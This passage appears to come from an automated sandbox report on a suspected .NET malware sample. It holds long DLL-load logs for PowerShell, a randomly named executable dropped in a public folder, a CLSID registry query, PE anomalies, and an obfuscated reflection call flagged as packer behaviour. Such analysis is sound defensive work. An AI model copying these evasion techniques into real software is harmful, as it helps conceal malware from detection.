                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeSection loaded: mscoree.dll
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeSection loaded: apphelp.dll
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeSection loaded: version.dll
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeSection loaded: windows.storage.dll
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeSection loaded: wldp.dll
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeSection loaded: profapi.dll
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeStatic file information: File size 2335232 > 1048576
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x239a00
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Data Obfuscation

                            barindex
                            .NET source code contains method to dynamically call methods (often used by packers)
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, B3txKmJG66b3TvIggSB.cs.Net Code: Type.GetTypeFromHandle(PZVO9XQyvEW6EWkCOTf.bIKBvN28j2l(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(PZVO9XQyvEW6EWkCOTf.bIKBvN28j2l(16777246)),Type.GetTypeFromHandle(PZVO9XQyvEW6EWkCOTf.bIKBvN28j2l(16777260))})
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeCode function: 0_2_00007FF848DF00BD pushad ; iretd 0_2_00007FF848DF00C1
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeCode function: 0_2_00007FF848DF4C1A push esi; retf 0_2_00007FF848DF4C21
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeCode function: 0_2_00007FF848FAC3FB push ecx; iretd 0_2_00007FF848FAC3FC
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeCode function: 0_2_00007FF849042601 push es; ret 0_2_00007FF849042605
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeCode function: 0_2_00007FF8490418E2 push edx; ret 0_2_00007FF8490418E4
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeCode function: 0_2_00007FF849044714 push edx; ret 0_2_00007FF849044716
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeCode function: 0_2_00007FF849042B42 push edi; ret 0_2_00007FF849042B43
